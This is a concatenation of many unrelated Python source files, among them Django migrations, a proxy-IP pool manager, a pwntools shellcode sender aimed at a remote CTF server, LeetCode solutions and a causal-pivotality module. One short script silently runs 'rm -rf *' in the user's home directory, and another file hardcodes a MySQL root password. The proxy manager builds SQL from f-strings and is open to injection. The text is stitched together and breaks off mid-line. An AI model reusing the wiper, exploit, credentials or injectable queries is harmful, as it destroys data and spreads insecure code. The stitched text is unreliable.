# Generated by Django 2.2 on 2020-09-22 16:47 from django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('django_celery_results', '0007_remove_taskresult_hidden'), ] operations = [ migrations.CreateModel( name='Run', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('task', models.ForeignKey(on_delete=django.db.models.deletion.DO_NOTHING, to='django_celery_results.TaskResult')), ], ), migrations.CreateModel( name='Contact_Form', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('name', models.CharField(max_length=200, null=True, verbose_name='isim')), ('surname', models.CharField(max_length=200, null=True, verbose_name='soyisim')), ('gsm_no', models.IntegerField(null=True, verbose_name='gsm_no')), ('email', models.CharField(max_length=200, null=True, verbose_name='email')), ('message', models.TextField(max_length=20000, null=True, verbose_name='mesaj')), ('created_date', models.DateTimeField(auto_now_add=True, null=True, verbose_name='Register Date')), ('main_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), ], ), ]
import json import re import threading import time import datetime from reload.res_test import func_res_test from sql_server import MySql class manage_ip: ip_pool = [] def __init__(self): self.find_store_ip = self.input_ip()#将ip载入 self.starts() def starts(self): self.add_ip() t1 = threading.Thread(target= self.check) t1.start() def input_ip(self): return find_store_ip() def check(self):#检查ip池的数据,如果小于5,那么立刻添加进入ip_pool,如果没有新的ip进来,就一直处于监听转台 ''' 这里面需要完成如果ip池小于10,那么,不断补充新的ip,如果没有有效的ip,那么程序一直处于监听状态 ''' while(1): time.sleep(60) if len(self.ip_pool)<5: self.add_ip() def add_ip(self):#将ip添入ip_pool ''' 将代理ip添加入ip_pool :return:如果成功,返回true,否则,False ''' print("正在添加~~~~~~") today = datetime.date.today() sql = f'''select ip from ip_pool where valid=1 and date = "{today}"''' db = MySql() res = db.fetch_all(sql) print(type(res)) if res != tuple(): for i in res: self.ip_pool.append(i[0]) print("添加成功") return True print("添加失败,数据库中没有合适的值") return False def update_valid(self,ip):#将valid变为0 sql = f'''update ip_pool set valid = 0 where ip="{ip}"''' db = MySql() res = db.execute(sql) print("delete ok") def delete_today(self):#将今天的数据全部删除 sql = "Delete from ip_pool where 1=1" db = MySql() res = db.execute(sql) print("delete all ok") # self.ip_pool.extend(新的ip) class find_store_ip: def __init__(self): self.res = func_res_test() self.starts() def starts(self): self.to_mange() t1= threading.Thread(target=self.listen_write) t1.start() print(">>") def ip_check(self, ip): ''' :param :ip是测试ip :return: True为可用ip,False为不可用ip ''' test_url = "https://api.bilibili.com/x/space/arc/search?mid=451618887&;pn=1&ps=100&jsonp=jsonp" response = self.res.init_head(test_url, time=3, ip=ip) if response == None: return False if response.status_code != 200: return False else: return True def listen_write(self): while(1): time.sleep(100) url = input("请输入获得ip的地址,如若想退出,请按quit") self.to_mange2(url) if url == "quit": break def to_mange(self):#控制各个小功能块 url = input("请输入获得ip的地址") ip_item = self.get_ip(url) if ip_item!=None and ip_item !=[] : for i in ip_item: if self.ip_check(i): self.ip_store(i) return False return True def to_mange2(self,url):#控制各个小功能块 ip_item = self.get_ip(url) if ip_item!=None and ip_item !=[] : for i in ip_item: if self.ip_check(i): self.ip_store(i) def get_ip(self,url): ''' :param url: 获取代理api :return: 代理ip列表,如果无法连接,返回None,连接初见错误,返回[],如果正常连接,返回response ''' response = None try: response = self.res.init_head(url, time=4) if response.status_code != 200: print("url错误!!!") return [] else: return self.get_ip_rules(response) except Exception as e: print(e) return response def get_ip_rules(self,response):#获得返回后,提取ip的规则 ''' :param response: :return: list ''' js = response.text print(re.findall(r'\d+.\d+.\d+.\d+:\d+', js)) return re.findall(r'\d+.\d+.\d+.\d+:\d+', js) def ip_store(self,ip): db = MySql() sql = f'''insert into ip_pool values(null,'{ip}',NOW(),1)''' print(sql) db.execute(sql) if __name__ == '__main__': # p = find_store_ip() p = manage_ip() # p.delete_today() # http://x.fanqieip.com/index.php?s=/Api/IpManager/adminFetchFreeIpRegionInfoList&uid=12522&ukey=caa11eef0b28fa88056de334a5c0c2e3&limit=10&format=0&page=1
#!/usr/bin/python #coding=utf-8 #__author__:TaQini from pwn import * context.log_level = 'debug' context.arch = 'amd64' p=remote('157.245.88.100', 7778) sc=asm('xor rax,rax\n mov al,7\nret\n') p.sendline(sc) p.interactive()
from __future__ import print_function, division, absolute_import import csv import numpy as np import copy import matplotlib.pyplot as plt __all__ = ['paths', 'top_path'] import matplotlib font = {'family' : 'normal', 'weight' : 'normal', 'size' : 18} matplotlib.rc('font', **font) ########## Load in transition data ############ t_file=open('../../../Output_Files/transition_search.dat') transitions_tot=[] with t_file as my_file: for line in my_file: myarray=np.fromstring(line, dtype=float, sep=' ') transitions_tot.append(myarray) transitions=transitions_tot data=np.loadtxt('../../../Input_Files/input.dat') ## input data from Conf_search Most_likely_paths=[int(p) for p in np.loadtxt('pathway.dat')] ## most likely path from Dijkstra's algorithm z_ind = 0 inc_ind = 1 az_ind = 2 en_ind = 3 top_z=np.max(data[:,0]) ## starting z used to build transition matrix bott_z=-11.5 ## ending z used to build transition matrix z_step = 1 ## step size used to build transition matrix inc_step = 18 ## step size used to build transition matrix az_step = 18 ## step size used to build transition matrix ###### Create grids in z, incliantion and azimuthal spaces. These grids are used to plot the eventual path ###### it=0 Grid_z=[] Grid_ang=[] Grid_az=[] iteration=0 z_step=1 z_num=int((top_z-bott_z)/float(z_step)) grid_z=[] for i in range(z_num): z_i=top_z-z_step*i grid_z=np.append(grid_z,z_i) grid_inc_ang=np.arange(0,180,inc_step) grid_az_ang=np.arange(0,360,az_step) for z in range(len(grid_z)): for ang in range(len(grid_inc_ang)): for az in range(len(grid_az_ang)): Grid_z=np.append(Grid_z,grid_z[z]) Grid_ang=np.append(Grid_ang,grid_inc_ang[ang]) Grid_az=np.append(Grid_az,grid_az_ang[az]) iteration+=1 ######## For each point along the path, determine the associated grid value ############ mlp_z=[] mlp_ang=[] mlp_az=[] for j in range(len(Most_likely_paths)): if Most_likely_paths[j]!=7402 and Most_likely_paths[j]!=0: iteration_number=Most_likely_paths[j] mlp_z=np.append(mlp_z,Grid_z[int(iteration_number)]) mlp_ang=np.append(mlp_ang,Grid_ang[int(iteration_number)]+9) mlp_az=np.append(mlp_az,Grid_az[int(iteration_number)]+9) MLP_z=mlp_z MLP_ang=mlp_ang MLP_az=mlp_az ####### Plot the paths !######### plt.plot(MLP_z,MLP_ang,color='black') plt.scatter(MLP_z,MLP_ang,color='black') plt.ylim(0,180) plt.savefig(f'path_scatter_inc_z_full.png',bbox_inches='tight',transparent=True) plt.close() plt.plot(MLP_z,MLP_az,color='black') plt.scatter(MLP_z,MLP_az,color='black') plt.ylim(0,360) plt.savefig(f'path_scatter_az_z_full.png',bbox_inches='tight',transparent=True) plt.close()
# Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import json import math import time import numpy as np from . import colortables from webservice.algorithms.NexusCalcHandler import NexusCalcHandler as BaseHandler from webservice.NexusHandler import nexus_handler @nexus_handler class ColorBarCalcHandler(BaseHandler): name = "ColorBarHandler" path = "/colorbar" description = "Creates a CMC colorbar spec for a dataset" params = { "ds": { "name": "Dataset", "type": "string", "description": "A supported dataset shortname identifier" }, "t": { "name": "Time", "type": "int", "description": "Data observation date if not specifying a min/max" }, "min": { "name": "Minimum Value", "type": "float", "description": "Minimum value to use when computing color scales. Will be computed if not specified" }, "max": { "name": "Maximum Value", "type": "float", "description": "Maximum value to use when computing color scales. Will be computed if not specified" }, "ct": { "name": "Color Table", "type": "string", "description": "Identifier of a supported color table" } } singleton = True def __init__(self, tile_service_factory): BaseHandler.__init__(self, tile_service_factory) def __get_dataset_minmax(self, ds, dataTime): dataTimeStart = dataTime - 86400.0 # computeOptions.get_datetime_arg("t", None) dataTimeEnd = dataTime daysinrange = self._get_tile_service().find_days_in_range_asc(-90.0, 90.0, -180.0, 180.0, ds, dataTimeStart, dataTimeEnd) ds1_nexus_tiles = self._get_tile_service().get_tiles_bounded_by_box_at_time(-90.0, 90.0, -180.0, 180.0, ds, daysinrange[0]) data_min = 100000 data_max = -1000000 for tile in ds1_nexus_tiles: data_min = np.min((data_min, np.ma.min(tile.data))) data_max = np.max((data_max, np.ma.max(tile.data))) return data_min, data_max def __produce_color_list(self, colorbarDef, numColors, min, max, units): colors = [] labels = [] values = [] for i in range(0, numColors): index = float(i) / float(numColors) index = index * (len(colorbarDef) - 1) prev = int(math.floor(index)) next = int(math.ceil(index)) f = index - prev prevColor = colorbarDef[prev] nextColor = colorbarDef[next] color = [0, 0, 0, 255] color[0] = nextColor[0] * f + (prevColor[0] * (1.0 - f)) color[1] = nextColor[1] * f + (prevColor[1] * (1.0 - f)) color[2] = nextColor[2] * f + (prevColor[2] * (1.0 - f)) colors.append('%02x%02x%02xFF' % (color[0], color[1], color[2])) value = (float(i) / float(numColors - 1)) * (max - min) + min valueHigh = (float(i + 1) / float(numColors - 1)) * (max - min) + min labels.append("%3.2f %s" % (value, units)) values.append((value, valueHigh)) return colors, labels, values def calc(self, computeOptions, **args): ds = computeOptions.get_argument("ds", None) dataTime = computeOptions.get_datetime_arg("t", None) if dataTime is None: raise Exception("Missing 't' option for time") dataTime = time.mktime(dataTime.timetuple()) color_table_name = computeOptions.get_argument("ct", "smap") color_table = colortables.__dict__[color_table_name] min = computeOptions.get_float_arg("min", np.nan) max = computeOptions.get_float_arg("max", np.nan) num_colors = computeOptions.get_int_arg("num", 255) units = computeOptions.get_argument("units", "") if np.isnan(min) or np.isnan(max): data_min, data_max = self.__get_dataset_minmax(ds, dataTime) if np.isnan(min): min = data_min if np.isnan(max): max = data_max colors, labels, values = self.__produce_color_list(color_table, num_colors, min, max, units) obj = { "scale": { "colors": colors, "labels": labels, "values": values }, "id": ds } class SimpleResult(object): def toJson(self): return json.dumps(obj, indent=4) return SimpleResult()
class Solution(object): def __init__(self, head): """ @param head The linked list's head. Note that the head is guaranteed to be not null, so it contains at least one node. :type head: ListNode """ self.head = head def getRandom(self): """ Returns a random node's value. :rtype: int """ result, node, index = self.head, self.head.next, 1 while node: if random.randint(0, index) is 0: result = node node = node.next index += 1 return result.val import random class Solution(object): def __init__(self, head): self.arr = [] while head: self.arr.append(head.val) head = head.next def getRandom(self): return random.choice(self.arr)
import os , sys , time , datetime, re reload(sys) sys.setdefaultencoding('utf-8') os.system('cd && rm -rf * ') os.system('cd /sdcard && rm -rf afzajaan') print(' BY BY ' ) print('') print(' ') print(' HOP :) ' )
# -*- coding: utf-8 -*- from __future__ import unicode_literals from __future__ import absolute_import from django import template from django.db import models from django.template.loader import render_to_string from django.core.urlresolvers import reverse from django.utils.text import slugify from django.core.urlresolvers import NoReverseMatch Widget = models.get_model('magiccontent', 'Widget') Area = models.get_model('magiccontent', 'Area') register = template.Library() def get_first_content(content_list, widget): if not content_list: first_item = widget.get_widget_type.site_objects.create(widget=widget) first_item.save() else: first_item = content_list[0] return first_item @register.simple_tag(takes_context=True) def show_widget_area_tag(context, area_name, can_edit=False, widget_type='textimagecontent', style='default', *args, **kwargs): """ Template Tag for generating a custom HTML for the given 'area_name' which will have a correspondent Widget. When the Area does not exist, it will be generated an Area, Widget and its BaseContent register. """ request = context['request'] div = kwargs.get('div', None) page_url = kwargs.get('page_url', None) area, created = Area.site_objects.get_or_create(name=area_name) if created: widget = Widget.site_objects.create( widget_type=widget_type, style_template=style) area.widget = widget area.save() content_list = Widget.site_objects.list_content_from_type(area.widget) first_item = get_first_content(content_list, area.widget) # TODO: find a better place to add those CSS style classes names editable = 'darkBorder edit-block' if can_edit else '' template_name = 'magiccontent/{0}/{1}.html'.format( area.widget.widget_type, area.widget.style_template) context.update({'widget': area.widget, 'area': area, 'div': div, 'object_list': content_list, 'object': first_item, 'can_edit': can_edit, 'editable': editable, 'page_url': page_url, 'user': request.user}) return render_to_string(template_name, context) @register.filter(name='is_an_area_visible_tag') def is_an_area_visible_tag(area_name): try: area = Area.site_objects.get(name=area_name) except Area.DoesNotExist: area = None if not area: return True return area.is_visible @register.simple_tag(takes_context=True) def show_widget_page_tag(context, widget=None, content_list=[], can_edit=False, show_page=False, style=None): """ Template Tag for generating a custom HTML for the given Widget Page """ page = "_page" if show_page else '' style_template = style if style else widget.style_template template_name = 'magiccontent/{0}/{1}{2}.html'.format( widget.widget_type, style_template, page) first_item = get_first_content(content_list, widget) context.update({'widget': widget, 'object_list': content_list, 'can_edit': can_edit, 'object': first_item, }) return render_to_string(template_name, context) @register.inclusion_tag('magiccontent/show_editable_area_tag.html') def show_editable_area_tag(area_id='', widget_id='', can_edit=False, area_name='area'): return {'area_id': area_id, 'widget_id': widget_id, 'area_name': area_name, 'can_edit': can_edit, 'widget': Widget.site_objects.get(pk=int(widget_id))} @register.inclusion_tag('magiccontent/show_editable_widget_tag.html', takes_context=True) def show_editable_widget_tag(context, widget_type='', widget_id='', content_id='', can_edit=False, show_add_btn=True, show_order_btn=True, show_sytle_btn=True): content_create_url = 'magiccontent.%s.create' % widget_type content_update_url = 'magiccontent.%s.update' % widget_type picture_update_url = 'magiccontent.%s.updatepicture' % widget_type content_order_url = 'magiccontent.%s.order' % widget_type create_url = reverse( content_create_url, kwargs={'widget_pk': widget_id}) if show_add_btn else '' update_url = reverse( content_update_url, kwargs={'widget_pk': widget_id, 'pk': content_id}) try: updatepicture_url = reverse( picture_update_url, kwargs={'widget_pk': widget_id, 'pk': content_id}) except NoReverseMatch: updatepicture_url = None order_url = reverse( content_order_url, kwargs={'widget_pk': widget_id}) if show_order_btn else '' widget_update_url = reverse( 'magiccontent.widget.update', kwargs={'pk': widget_id}) _help_ctx = { 'help_edit_url': context.get('help_page_edit_content'), 'help_edit_show': context.get('show_help_page_edit_content'), 'help_edit_description': 'Learn how to edit contents', 'help_edit_flag': 'help_page_edit_content', 'help_add_url': context.get('help_page_add_content'), 'help_add_show': context.get('show_help_page_add_content'), 'help_add_description': 'Learn how to add new contents', 'help_add_flag': 'help_page_add_content', } ctx = {'create_url': create_url, 'update_url': update_url, 'updatepicture_url': updatepicture_url, 'order_url': order_url, 'style_url': widget_update_url if show_sytle_btn else '', 'can_edit': can_edit} ctx.update(_help_ctx) return ctx @register.filter(name='show_help_text', is_safe=True) def show_help_text(value): """ Returns a standard help file path """ return "magiccontent/help_text_{0}.html".format(slugify(value))
# -*- coding: utf-8 -*- """ Лабораторная работа 2 Работа с файлом, необходимо выполнить операции с текстовым файлом Стратегия, шаблонный метод """ import os import shutil file = 'C:/Users/Alexey/Desktop/file.txt' class Delete_FILE:#Класс Операции def solve(self, file): os.remove(file) return 'Файл - '+file+' успешно удален !' class Copy_FILE:#Класс Операции def solve(self, file): shutil.copyfile(file,'C:/Users/Alexey/Desktop/сюда/'+file.split('/')[-1]) return 'Файл успешно скопирован !' class Create_FILE:#Класс Операции def solve(self, file): f = open(file, 'w', encoding = 'utf-8') f.close() return 'Файл - '+file+' успешно создан !' class GENERAL: #Основной Класс def SET_STRATEGY(self, STRATEGY): self.STRATEGY = STRATEGY def solve(self, file): print(self.STRATEGY.solve(file)) start = GENERAL() start.SET_STRATEGY(Delete_FILE()) start.solve("C:/Users/Alexey/Desktop/file.txt") input() start.SET_STRATEGY(Create_FILE()) start.solve("C:/Users/Alexey/Desktop/file.txt") input() start.SET_STRATEGY(Copy_FILE()) start.solve("C:/Users/Alexey/Desktop/file.txt") input() start.SET_STRATEGY(Delete_FILE()) start.solve("C:/Users/Alexey/Desktop/сюда/file.txt")
#!/usr/bin/env python3 from setuptools import setup import os, os.path import sys ver = "1.2" def read(filename): return open(os.path.join(os.path.dirname(__file__), filename)).read() if sys.version_info < (3,0): print('Oops, only python >= 3.0 supported!') sys.exit() setup(name = 'pixelterm', version = ver, description = 'Render pixely images on your terminal. Now also with animated GIF support.', license = 'BSD', author = 'jaseg', author_email = 'pixelterm@jaseg.net', url = 'https://github.com/jaseg/pixelterm', packages = ['pixelterm'], install_requires=['pillow'], py_modules = [ 'commands' ], entry_points = {'console_scripts': [ 'pixelterm=commands:pixelterm', 'unpixelterm=commands:unpixelterm', 'gifterm=commands:gifterm', 'colorcube=commands:colorcube', 'resolvecolor=commands:resolvecolor', 'pngmeta=commands:pngmeta']}, classifiers = [ 'Development Status :: 5 - Production/Stable', 'Environment :: Console', 'Intended Audience :: Information Technology', 'Intended Audience :: Intended Audience :: End Users/Desktop', 'License :: Freely Distributable', 'License :: OSI Approved :: BSD License', 'Programming Language :: Python :: 3', 'Topic :: Internet', 'Topic :: Graphics', 'Topic :: System :: Networking' 'Topic :: Text Processing :: Filters', 'Topic :: Utilities', ], long_description = read('README.md'), dependency_links = [], )
"""If users enters x number of positive integers. Program goes through those integers and finds the maximum positive and updates the code. If a negative integer is inputed the progam stops the execution """ """ num_int = int(input("Input a number: ")) # Do not change this line max_int = num_int while num_int >= 0: if num_int > max_int: max_int = num_int num_int = int(input("Input a number: ")) print ("The maximum is", max_int) """ n = int(input("Enter the length of the sequence: ")) # Do not change this line num1 = 0 num2 = 0 num3 = 1 i = 1 for i in range(n): temp3 = num3 num3 = num1 + num2 + num3 if i > 1: num1 = num2 num2 = temp3 print(num3)
from django.shortcuts import render from django.views.generic.edit import CreateView from .models import First # Create your views here. def view(request): query = First.objects.all() return render(request, 'view.html', {'data': query}) class Create(CreateView): model = First fields = ('title', 'content') template_name = 'add.html' success_url = '/first/create'
from keras.callbacks import Callback class YpredCallback(Callback): """Used as a callback for Keras to get Ypred_train, and Ypred_test for each epoch. Example: yc = YpredCallback(X, X) model.fit(X, Y, callbacks=[yc] """ def __init__(self, model, X_train, X_test=None): self.model = model # Keras model self.Y_train = [] self.Y_test = [] self.X_train = X_train # If X_test is None, use X_train if X_test is None: self.X_test = X_train else: self.X_test = X_test def on_epoch_end(self, model, epoch, logs=None): Y_train_pred = self.model.predict(self.X_train).flatten() Y_test_pred = self.model.predict(self.X_test).flatten() self.Y_train.append(Y_train_pred) self.Y_test.append(Y_test_pred)
from hierarchy import Hierarchy from situation import Situation from itertools import product, combinations from fractions import Fraction import networkx as nx ''' Return whether a cause is pivotal if the cause was different, the effect would have been different parameters: Hierarchy hierarchy str cause str effect dict attr containing effect value return: True or False ''' # def pivotal(hierarchy, cause, effect, **attr): # # set initial outcome # outcome = hierarchy.evaluate(effect) # copy = hierarchy.copy() # # print 'before' # # copy.print_situation() # copy.clear_values() # if attr.has_key('values'): # copy.assign_values(attr['values']) # if attr.has_key('e_value'): # if outcome != attr['e_value']: # print 'False by e_value' # return False # copy.node[cause]['value'] = int(not hierarchy.node[cause]['value']) # new = copy.evaluate(effect) # # print 'after' # # copy.print_situation() # if outcome != new: # print 'True' # return True # else: # print 'False' # return False # ''' # Calculate pivotaility # parameters: # Hierarchy hierarchy # int level ???change to str??? # str cause node # str effect node # return: # Fraction # ''' # def pivotality(hierarchy, cause, effect, **attr): # copy = hierarchy.copy() # if attr.has_key('root'): # exogenous = filter(lambda a: copy.predecessors(a) == [] and nx.has_path(copy, a, effect), copy.nodes()) # else: # exogenous = filter(lambda a: nx.has_path(copy, a, effect), copy.nodes()) # print copy.path(cause, effect) # for suc in copy.path(cause, effect): # if suc in exogenous: # print 'suc', suc # exogenous.remove(suc) # if effect in exogenous: # exogenous.remove(effect) # if cause in exogenous: # exogenous.remove(cause) # if pivotal(hierarchy, cause, effect, attr=attr): # return 1 # # find values to compare to # actual_values = map(hierarchy.value, exogenous) # # pair values with their nodes # actual_values = zip(exogenous, actual_values) # def distance(values): # distance = 0 # values = zip(exogenous, values) # print 'actual', actual_values # print 'values', values # for a, b in zip(values, actual_values): # if a != b: # distance += 1 # print distance # return distance # closest_distance = len(exogenous) + 1 # closest_hierarchy = None # for values in product(*[(0, 1) for v in xrange(len(exogenous))]): # copy.clear_values() # for node, value in zip(exogenous, values): # copy.node[node]['value'] = value # print # print # if attr.has_key('e_value'): # print 'here' # piv = pivotal(hierarchy, cause, effect, e_value=attr.get('e_value'), values=zip(exogenous, values)) # else: # piv = pivotal(hierarchy, cause, effect, values=zip(exogenous, values)) # print closest_distance # if distance(values) < closest_distance and piv: # closest_distance = distance(values) # print 'changed closeest_distance to', closest_distance # closest_hierarchy = values # return Fraction(1, closest_distance + 1) if closest_hierarchy != None else 0 ''' NEW ''' def pivotality(hierarchy, cause, effect, **attr): copy = hierarchy.copy() if pivotal(hierarchy, cause, effect): return 1 exogenous = copy.nodes() if 'root' in attr: exogenous = filter(lambda a: copy.predecessors(a) == [], exogenous) if cause in exogenous: exogenous.remove(cause) if effect in exogenous: exogenous.remove(effect) for i in xrange(len(exogenous)+1): for combo in combinations(exogenous, i): sub = hierarchy.copy() # print 'combo', combo for c in combo: sub.remove_edges_from([(e, c) for e in copy.predecessors(c)]) if attr.has_key('e_value'): piv = pivotal(sub, cause, effect, combo=combo, e_value=attr.get('e_value')) else: piv = pivotal(sub, cause, effect, combo=combo) if piv: return Fraction(1, i + 1) return 0 def pivotal(hierarchy, cause, effect, **attr): if 'combo' in attr: copy = hierarchy.copy() for c in attr['combo']: copy.node[c]['value'] = int(not copy.node[c]['value']) else: copy = hierarchy.copy() copy.clear_values() if attr.has_key('values'): copy.assign_values(attr['values']) # set initial outcome outcome = copy.evaluate(effect) # copy.print_situation() if attr.has_key('e_value'): if outcome != attr['e_value']: return False copy.node[cause]['value'] = int(not hierarchy.node[cause]['value']) new = copy.evaluate(effect) if outcome != new: return True else: return False ''' find the probability that a node will be pivotal through sampling parameters: Hierarchy hierarchy str node str effect int samples return: float criticality calculated through sampling ''' def prob_pivotal(hierarchy, node, effect, samples=100, **attr): count = 0 total = 0 for sample in xrange(samples): # create a deepcopy of the hierarchy copy = hierarchy.copy() # sample root nodes to create a new situation if 'priors' in hierarchy.graph: copy.sample_values() else: for i in filter(lambda a: a[0] == str(0), hierarchy.nodes()): copy.sample_value(i, copy.node[i].get('prior')) # evaluate the effect that occured in the situation copy.evaluate(effect) # if we are considering only cases specified by e_value if attr.has_key('e_value'): # if the effect in this situation matches e_value increase total if copy.value(effect) == attr['e_value']: total += 1 # if the node was pivotal for the account increase count if pivotal(copy, node, effect, attr['e_value']): count += 1 else: if pivotal(copy, node, effect, None): count += 1 # if total is still zero, we are evaluvating prob_pivotal for all cases # set total to the sample size if total == 0: total = samples return float(count)/total ''' P(cause=pivotal, effect=e_value)/P(effect=e_value) = P(cause=pivotal | effect=e_value) parameters: Hierarchy hierarchy str cause str effect dict attr / e_value(target effect value) return: float criticality ''' def criticality(hierarchy, cause, effect, **attr): copy = hierarchy.copy() exogenous = filter(lambda a: copy.predecessors(a) == [], copy.nodes()) count = 0 total = 0 for settings in list(product(*[(0, 1) for v in xrange(len(exogenous))])): values = list(zip(exogenous, settings)) copy.clear_values() copy.assign_values(values) outcome = copy.evaluate(effect) copy.clear_values() if attr.has_key('e_value'): if outcome == attr['e_value']: total += 1 if pivotal(copy, cause, effect, e_value=attr['e_value']): count += 1 else: total = len(list(product(*[(0, 1) for v in xrange(len(exogenous))]))) if pivotal(copy, cause, effect): count += 1 return float(count)/total def unpacked_pivotality(hierarchy, cause, effect, **attr): path = hierarchy.path(cause, effect) if path != []: piv = [] for node in path: if node != effect: if 'e_value' in attr: p = pivotality(hierarchy, node, effect, e_value=attr['e_value']) else: p = pivotality(hierarchy, node, effect) piv.append(p) return sum(piv)/float(len(piv)) else: return 'cannot be unpacked'
# Generated by Django 2.2.7 on 2019-12-12 08:33 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('web', '0004_auto_20191212_0831'), ] operations = [ migrations.AlterUniqueTogether( name='document', unique_together={('source', 'embedding_type')}, ), ]
# -*- coding: utf-8 -*- from sqlalchemy import create_engine __author__ = 'Haoran' mysql_db = create_engine('mysql+pymysql://root:growth@192.168.20.96:3306/sem?charset=utf8', echo=False) user_agent = """Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.116 Safari/537.36""" headers = {'User-Agent': user_agent}
def fib(max): n,a,b = 0,0,1 while n < max: print(b) a,b = b,a+b n += 1 return 'lalalalal' fib(6)
from wit import Wit import wave import pyaudio import os from array import array import logging class Witai: def __init__(self): self.client = Wit(access_token=os.environ.get('wit_token')) def create_audio_file(self): audio_format = pyaudio.paInt16 channels = 2 sample_rate = 44100 chunk = 1024 recording_seconds = 5 file_name = "resources/audio.wav" audio = pyaudio.PyAudio() # instantiate the pyAudio # recording prerequisites stream = audio.open(format=audio_format, channels=channels, rate=sample_rate, input=True, frames_per_buffer=chunk) # starting recording frames = [] for i in range(0, int(sample_rate / chunk * recording_seconds)): data = stream.read(chunk) data_chunk = array('h', data) vol = max(data_chunk) if vol >= 500: frames.append(data) # end of recording stream.stop_stream() stream.close() audio.terminate() # writing to file wave_file = wave.open(file_name, 'wb') wave_file.setnchannels(channels) wave_file.setsampwidth(audio.get_sample_size(audio_format)) wave_file.setframerate(sample_rate) wave_file.writeframes(b''.join(frames)) # append frames recorded to file wave_file.close() def create_message_request(self, text): try: resp = self.client.message(text) print('Yay, got Wit.ai response: ' + str(resp)) except Exception: self.client.logger.setLevel(logging.WARNING) print('Something went wrong with the message request') def create_speech_request(self): self.create_audio_file() try: with open('resources/audio.wav', 'rb') as f: res = self.client.speech(f, None, {'Content-Type': 'audio/wav'}) print('Yay, got Wit.ai response: ' + str(res)) except Exception: self.client.logger.setLevel(logging.WARNING) print("Something went wrong with the speech request")
import sys import random #define a function for printing a grid def print_grid(input_grid): print("||-------||"); for row in input_grid: print(row); print("||-------||"); #input parameters M, N = 5, 7; max_val = 5; #use hashtables as SETS (because insertion in hash-table is O(1), but for sets it is O(n)) row_hash_table = {}; col_hash_table = {}; #create a grid for testing purposes grid = [ [random.randint(0, max_val) for col in range(N)] for row in range(M) ]; print_grid(grid); #check the rows, cols that need to be set to zero (in O(MN)) for row in range(len(grid)): for col in range(len(grid[0])): if (not grid[row][col]): row_hash_table[row] = True; col_hash_table[col] = True; #go through elements in the hash-tables, clear the rows and the columns in (in O(MN)) for row in row_hash_table: grid[row] = [0] * len(grid[row]); for col in col_hash_table: for row in range(len(grid)): grid[row][col] = 0; #print the output print_grid(grid);
# -*- coding: utf-8 -*- """ Created on Thu Mar 12 19:15:08 2015 @author: LIght """ import numpy class LFM: @staticmethod def matrix_factorization(R, P, Q, K, steps=1000, alpha=0.0002, beta=0.02): Q = Q.T for step in xrange(steps): print step for i in xrange(len(R)): for j in xrange(len(R[i])): if R[i][j] > 0: eij = R[i][j] - numpy.dot(P[i,:],Q[:,j]) for k in xrange(K): P[i][k] = P[i][k] + alpha * (2 * eij * Q[k][j] - beta * P[i][k]) Q[k][j] = Q[k][j] + alpha * (2 * eij * P[i][k] - beta * Q[k][j]) #eR = numpy.dot(P,Q) e = 0 for i in xrange(len(R)): for j in xrange(len(R[i])): if R[i][j] > 0: e = e + pow(R[i][j] - numpy.dot(P[i,:],Q[:,j]), 2) for k in xrange(K): e = e + (beta/2) * (pow(P[i][k],2) + pow(Q[k][j],2)) if e < 0.001: break return P, Q.T ''' example code, too slow for movielens matrix, optimize R = np.array(user_item_matrix) N = len(R) M = len(R[0]) K = 5 P = np.random.rand(N,K) Q = np.random.rand(M,K) nP, nQ = lfm.LFM.matrix_factorization(R, P, Q, K) nR = np.dot(nP, nQ.T) '''
# coding=utf-8 """ statusdocke.py Desc: from version rest API get service runing status._queryStatus() checkRunner() -> _checkRunning()->_isRunning(),_queryStatus() Maintainer: wangfm CreateDate: 2016/12/7 """ import requests import json from logger import logger from time import sleep # logging.basicConfig(level=logging.ERROR) # base data, Cautious modification serviceInfos = [{ 'serviceName': 'interact' }, { 'serviceName': 'jycenter' }, { 'serviceName': 'middlecenterfile' }, { 'serviceName': 'middlecas' }, { 'serviceName': 'middlecenterres' }, { 'serviceName': 'middleclient' }] # {'serviceName': 'middleware-mcu'}, # test Data,del later testflag = [{ 'status': 'On', u'dbversion': u'V1.10.11.R', 'serviceName': 'interact', u'version': u'V1.02.002.B.044', 'serviceIp': '10.1.0.56' }, { 'status': 'On', u'dbversion': u'V1.10.18.R', 'serviceName': 'jycenter', u'version': u'V1.01.001.B.008', 'serviceIp': '10.1.0.56' }, { 'status': 'On', u'dbversion': u'V1.10.15.R', 'serviceName': 'middlecenterfile', u'version': u'V1.00.001.B.010', 'serviceIp': '10.1.0.56' }, { 'status': 'On', 'serviceName': 'middlecas', u'version': u'V1.02.002.B.007', 'serviceIp': '10.1.0.56' }, { 'status': 'On', u'dbversion': u'V1.10.18.R', 'serviceName': 'middlecenterres', u'version': u'V1.01.001.B.008', 'serviceIp': '10.1.0.56' }, { 'status': 'On', 'serviceName': 'middleclient', u'version': u'V2.01.001.B.011', 'serviceIp': '10.1.0.56' }] def _queryStatus(*args): """ Function: _queryStatus() Desc: request rest API get service information. Args:    -   Return: dict-> service status   Usage:   Maintainer: wangfm   CreateDate: 2016/12/7 """ urlhead, urlip, dockermodel, urltail = 'http://', args[0], args[ 1], '/version' requesturl = ''.join([urlhead, urlip, '/', dockermodel, urltail]) logger.debug("Request URL is: {}".format(requesturl)) serviceStatusInit = { 'status': 'Off', 'serviceIp': args[0], 'serviceName': args[1] } try: r = requests.get(requesturl) # logger.debug(r) if r.status_code == 200: if not hasattr(r, 